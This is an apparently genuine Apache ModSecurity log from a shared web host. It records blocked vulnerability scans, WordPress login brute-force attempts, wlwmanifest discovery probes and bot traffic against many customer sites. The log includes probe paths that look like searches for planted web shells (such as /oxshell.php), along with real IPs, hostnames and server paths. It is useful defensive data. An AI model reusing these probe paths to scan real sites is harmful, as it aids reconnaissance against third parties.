[Tue May 26 18:26:29.280105 2026] [security2:error] [pid 998632:tid 998886] [client 20.5.101.115:13263] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/ioxi-o.php"] [unique_id "ahWYfa1OTU2dW0MS1Emu9QAAAFk"]
[Tue May 26 18:26:29.906252 2026] [security2:error] [pid 998632:tid 998907] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYe61OTU2dW0MS1EmuzAAAAG4"]
[Tue May 26 18:26:29.941764 2026] [security2:error] [pid 998632:tid 998919] [client 20.5.101.115:2986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/in.php"] [unique_id "ahWYfa1OTU2dW0MS1EmvCAAAAHo"]
[Tue May 26 18:26:30.135834 2026] [security2:error] [pid 998632:tid 998913] [client 20.48.248.215:39801] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-info.php"] [unique_id "ahWYfq1OTU2dW0MS1EmvCgAAAHQ"]
[Tue May 26 18:26:30.135917 2026] [security2:error] [pid 998632:tid 998913] [client 20.48.248.215:39801] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-info.php"] [unique_id "ahWYfq1OTU2dW0MS1EmvCgAAAHQ"]
[Tue May 26 18:26:30.659134 2026] [security2:error] [pid 998632:tid 998892] [client 20.5.101.115:15563] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/info.php"] [unique_id "ahWYfq1OTU2dW0MS1EmvFwAAAF8"]
[Tue May 26 18:26:30.951224 2026] [security2:error] [pid 998632:tid 998756] [remote 50.6.207.27:49464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.207.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWYfq1OTU2dW0MS1EmvHQAAGmM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:26:31.080129 2026] [security2:error] [pid 998632:tid 998840] [client 34.121.140.123:55751] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWYf61OTU2dW0MS1EmvIQAAAC4"]
[Tue May 26 18:26:31.367979 2026] [security2:error] [pid 998632:tid 998844] [client 20.5.101.115:3001] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/inputs.php"] [unique_id "ahWYf61OTU2dW0MS1EmvLQAAADI"]
[Tue May 26 18:26:31.701451 2026] [security2:error] [pid 998632:tid 998807] [client 34.121.140.123:49915] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 123.140.121.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.vcresco.com"] [uri "/xmlrpc.php"] [unique_id "ahWYf61OTU2dW0MS1EmvNAAAABA"]
[Tue May 26 18:26:31.859352 2026] [security2:error] [pid 998632:tid 998908] [client 34.121.140.123:57922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWYf61OTU2dW0MS1EmvPwAAAG8"]
[Tue May 26 18:26:32.022732 2026] [security2:error] [pid 998632:tid 998802] [client 34.121.140.123:64954] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWYgK1OTU2dW0MS1EmvRgAAAAs"]
[Tue May 26 18:26:32.101226 2026] [security2:error] [pid 998632:tid 998905] [client 20.5.101.115:2143] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/item.php"] [unique_id "ahWYgK1OTU2dW0MS1EmvSgAAAGw"]
[Tue May 26 18:26:32.160006 2026] [security2:error] [pid 998632:tid 998826] [client 34.121.140.123:57914] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWYgK1OTU2dW0MS1EmvTgAAACI"]
[Tue May 26 18:26:32.377449 2026] [security2:error] [pid 998632:tid 998892] [client 34.121.140.123:60827] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWYgK1OTU2dW0MS1EmvTwAAAF8"]
[Tue May 26 18:26:32.532458 2026] [security2:error] [pid 998632:tid 998806] [client 34.121.140.123:55732] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahWYgK1OTU2dW0MS1EmvUwAAAA8"]
[Tue May 26 18:26:32.718340 2026] [security2:error] [pid 998632:tid 998804] [client 34.121.140.123:56895] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWYgK1OTU2dW0MS1EmvVQAAAA0"]
[Tue May 26 18:26:32.822262 2026] [security2:error] [pid 998632:tid 998886] [client 20.5.101.115:13306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/k.php"] [unique_id "ahWYgK1OTU2dW0MS1EmvWgAAAFk"]
[Tue May 26 18:26:32.840447 2026] [security2:error] [pid 998632:tid 998915] [client 185.251.19.123:43741] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 123.19.251.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWYgK1OTU2dW0MS1EmvVAAAAHY"]
[Tue May 26 18:26:32.871507 2026] [security2:error] [pid 998632:tid 998889] [client 34.121.140.123:60672] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWYgK1OTU2dW0MS1EmvXAAAAFw"]
[Tue May 26 18:26:33.032283 2026] [security2:error] [pid 998632:tid 998888] [client 34.121.140.123:50013] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWYga1OTU2dW0MS1EmvXQAAAFs"]
[Tue May 26 18:26:33.196015 2026] [security2:error] [pid 998632:tid 998801] [client 34.121.140.123:50992] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahWYga1OTU2dW0MS1EmvYAAAAAo"]
[Tue May 26 18:26:33.329433 2026] [security2:error] [pid 998632:tid 998812] [client 74.7.228.38:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.rethinkinclusion.org.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahWYgK1OTU2dW0MS1EmvTQAAABU"]
[Tue May 26 18:26:33.331558 2026] [security2:error] [pid 998632:tid 998842] [client 74.7.228.38:52488] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.rethinkinclusion.org.thedebateafrica.org"] [uri "/robots.txt"] [unique_id "ahWYgK1OTU2dW0MS1EmvSwAAMHY"]
[Tue May 26 18:26:33.339431 2026] [security2:error] [pid 998632:tid 998898] [client 34.121.140.123:57227] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWYga1OTU2dW0MS1EmvYQAAAGU"]
[Tue May 26 18:26:33.514358 2026] [security2:error] [pid 998632:tid 998909] [client 20.5.101.115:15588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/license.php"] [unique_id "ahWYga1OTU2dW0MS1EmvZQAAAHA"]
[Tue May 26 18:26:33.559391 2026] [security2:error] [pid 998632:tid 998816] [client 34.121.140.123:57238] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWYga1OTU2dW0MS1EmvagAAABk"]
[Tue May 26 18:26:33.660686 2026] [security2:error] [pid 998632:tid 998900] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYf61OTU2dW0MS1EmvJwAAAGc"]
[Tue May 26 18:26:33.821881 2026] [security2:error] [pid 998632:tid 998828] [client 34.121.140.123:52632] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.vcresco.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWYga1OTU2dW0MS1EmvcAAAACQ"]
[Tue May 26 18:26:34.191961 2026] [security2:error] [pid 998632:tid 998853] [client 20.5.101.115:15584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/load.php"] [unique_id "ahWYgq1OTU2dW0MS1EmvewAAADs"]
[Tue May 26 18:26:34.849279 2026] [security2:error] [pid 998632:tid 998793] [client 20.5.101.115:15561] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/manager.php"] [unique_id "ahWYgq1OTU2dW0MS1EmvjgAAAAI"]
[Tue May 26 18:26:35.068928 2026] [security2:error] [pid 998632:tid 998803] [client 113.162.75.136:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYf61OTU2dW0MS1EmvQgAAAAw"]
[Tue May 26 18:26:35.092666 2026] [security2:error] [pid 998632:tid 998804] [client 124.43.5.103:58798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWYgq1OTU2dW0MS1EmvhwAAAA0"]
[Tue May 26 18:26:35.092904 2026] [security2:error] [pid 998632:tid 998804] [client 124.43.5.103:58798] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWYgq1OTU2dW0MS1EmvhwAAAA0"]
[Tue May 26 18:26:35.514249 2026] [security2:error] [pid 998632:tid 998877] [client 20.5.101.115:2117] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/media.php"] [unique_id "ahWYg61OTU2dW0MS1EmvoQAAAFI"]
[Tue May 26 18:26:35.978978 2026] [security2:error] [pid 998632:tid 998785] [remote 54.39.0.211:33990] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "grcorp.in"] [uri "/robots.txt"] [unique_id "ahWYg61OTU2dW0MS1EmvqgAAdn4"]
[Tue May 26 18:26:35.979202 2026] [security2:error] [pid 998632:tid 998915] [client 54.39.0.211:33990] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "grcorp.in"] [uri "/robots.txt"] [unique_id "ahWYg61OTU2dW0MS1EmvqgAAdn4"]
[Tue May 26 18:26:36.015174 2026] [security2:error] [pid 998632:tid 998815] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYga1OTU2dW0MS1EmvZAAAABg"]
[Tue May 26 18:26:36.196307 2026] [security2:error] [pid 998632:tid 998891] [client 20.5.101.115:2970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/mar.php"] [unique_id "ahWYhK1OTU2dW0MS1EmvsgAAAF4"]
[Tue May 26 18:26:36.870920 2026] [security2:error] [pid 998632:tid 998918] [client 20.5.101.115:2973] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/my1.php"] [unique_id "ahWYhK1OTU2dW0MS1EmvywAAAHk"]
[Tue May 26 18:26:37.435205 2026] [security2:error] [pid 998632:tid 998661] [remote 15.235.98.37:43620] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "grcorp.in"] [uri "/"] [unique_id "ahWYha1OTU2dW0MS1Emv2AAAWwk"]
[Tue May 26 18:26:37.435433 2026] [security2:error] [pid 998632:tid 998888] [client 15.235.98.37:43620] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "grcorp.in"] [uri "/"] [unique_id "ahWYha1OTU2dW0MS1Emv2AAAWwk"]
[Tue May 26 18:26:37.553386 2026] [security2:error] [pid 998632:tid 998878] [client 20.5.101.115:2145] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/mm.php"] [unique_id "ahWYha1OTU2dW0MS1Emv2QAAAFM"]
[Tue May 26 18:26:38.270745 2026] [security2:error] [pid 998632:tid 998898] [client 20.5.101.115:13284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/network.php"] [unique_id "ahWYhq1OTU2dW0MS1Emv6wAAAGU"]
[Tue May 26 18:26:38.881948 2026] [security2:error] [pid 998632:tid 998881] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYhK1OTU2dW0MS1EmvuQAAAFY"]
[Tue May 26 18:26:38.927953 2026] [security2:error] [pid 998632:tid 998813] [client 20.5.101.115:10678] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/new.php"] [unique_id "ahWYhq1OTU2dW0MS1EmwAAAAABY"]
[Tue May 26 18:26:39.586001 2026] [security2:error] [pid 998632:tid 998825] [client 20.5.101.115:13282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/0x.php"] [unique_id "ahWYh61OTU2dW0MS1EmwGgAAACE"]
[Tue May 26 18:26:40.245113 2026] [security2:error] [pid 998632:tid 998898] [client 20.5.101.115:10638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/0.php"] [unique_id "ahWYiK1OTU2dW0MS1EmwKQAAAGU"]
[Tue May 26 18:26:40.436898 2026] [security2:error] [pid 998632:tid 998881] [client 20.48.248.215:42326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-test.php"] [unique_id "ahWYiK1OTU2dW0MS1EmwMwAAAFY"]
[Tue May 26 18:26:40.436985 2026] [security2:error] [pid 998632:tid 998881] [client 20.48.248.215:42326] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-test.php"] [unique_id "ahWYiK1OTU2dW0MS1EmwMwAAAFY"]
[Tue May 26 18:26:40.717282 2026] [autoindex:error] [pid 998632:tid 998824] [client 194.163.140.214:49956] AH01276: Cannot serve directory /home2/tips4iow/public_html/m2wealthadvisor.com/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 18:26:40.891804 2026] [security2:error] [pid 998632:tid 998710] [remote 185.227.134.44:45428] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.134.227.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahWYiK1OTU2dW0MS1EmwOgAAFzY"]
[Tue May 26 18:26:40.901886 2026] [security2:error] [pid 998632:tid 998923] [client 20.5.101.115:13267] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/oxshell.php"] [unique_id "ahWYiK1OTU2dW0MS1EmwRAAAAH4"]
[Tue May 26 18:26:41.412823 2026] [security2:error] [pid 998632:tid 998924] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYh61OTU2dW0MS1EmwDQAAAH8"]
[Tue May 26 18:26:41.570798 2026] [security2:error] [pid 998632:tid 998798] [client 20.5.101.115:16070] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/php8.php"] [unique_id "ahWYia1OTU2dW0MS1EmwUQAAAAc"]
[Tue May 26 18:26:41.995127 2026] [security2:error] [pid 998632:tid 998812] [client 74.7.228.31:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "strapptech.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWYia1OTU2dW0MS1EmwYAAAABU"]
[Tue May 26 18:26:41.995885 2026] [security2:error] [pid 998632:tid 998904] [client 74.7.228.31:43854] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "strapptech.com"] [uri "/robots.txt"] [unique_id "ahWYia1OTU2dW0MS1EmwXAAAa0I"]
[Tue May 26 18:26:42.228204 2026] [security2:error] [pid 998632:tid 998855] [client 20.5.101.115:10675] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/p.php"] [unique_id "ahWYiq1OTU2dW0MS1EmwZQAAAD0"]
[Tue May 26 18:26:42.884668 2026] [security2:error] [pid 998632:tid 998856] [client 20.5.101.115:16065] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/php.php"] [unique_id "ahWYiq1OTU2dW0MS1EmwdQAAAD4"]
[Tue May 26 18:26:43.543283 2026] [security2:error] [pid 998632:tid 998902] [client 20.5.101.115:11700] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/past.php"] [unique_id "ahWYi61OTU2dW0MS1EmwggAAAGk"]
[Tue May 26 18:26:43.991313 2026] [security2:error] [pid 998632:tid 998727] [remote 185.227.134.44:45428] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.134.227.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahWYi61OTU2dW0MS1EmwjAAAUUc"], referer: https://kurgu-afrika.com/wp-login.php
